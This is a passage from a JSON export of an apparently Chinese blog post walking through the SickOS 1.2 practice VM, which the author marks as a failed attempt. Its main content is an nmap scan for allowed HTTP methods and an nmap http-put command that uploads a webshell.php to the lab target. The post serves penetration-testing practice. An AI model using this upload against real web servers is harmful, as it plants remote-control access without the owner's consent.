src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320661.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240207114331521\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>6\uff0c\u771f\u4e0d\u77e5\u9053\u9519\u5728\u54ea\u91cc\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320662.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320662.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240207114954782\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u5176\u4ed6\u6f0f\u6d1e\u5427<\/h3>\n<p>\u672a\u53d1\u73b0\u53ef\u4ee5\u5229\u7528\u7684\u6f0f\u6d1e\u3002\u3002\u3002\u3002<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u5e08\u5085\u4eec\u4f7f\u7528<code>nmap<\/code>\u8fdb\u884c\u4e86\u626b\u63cf\uff0c\u5f97\u77e5\u4e86put\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap --script http-methods --script-args http-methods.url-path=&#039;\/test&#039; 192.168.244.183<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320663.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320663.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205224037334\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f20\u5165\u6587\u4ef6\u7684\u65f6\u5019\u53ef\u4ee5\u91c7\u7528\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap 192.168.244.183 -p 80 --script http-put --script-args http-put.url=&#039;\/test\/nmap_webshell.php&#039;,http-put.file=&#039;\/home\/kali\/temp\/webshell.php&#039;<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u8fd9\u91cc\u5931\u8d25\u4e86\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320664.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320664.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205232539742\" style=\"zoom:50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SICKOS: 1.2\uff08\u5931\u8d25\uff09 \u9009\u62e9\u6253\u5f00\u73af\u5883\uff08VMware\uff09 \u53ef\u4ee5\u4f7f\u7528VMware\u6253\u5f00\uff0cVirtualBox\u6253 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-358","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=358"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358\/revisions"}],"predecessor-version":[{"id":359,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358\/revisions\/359"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=358"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}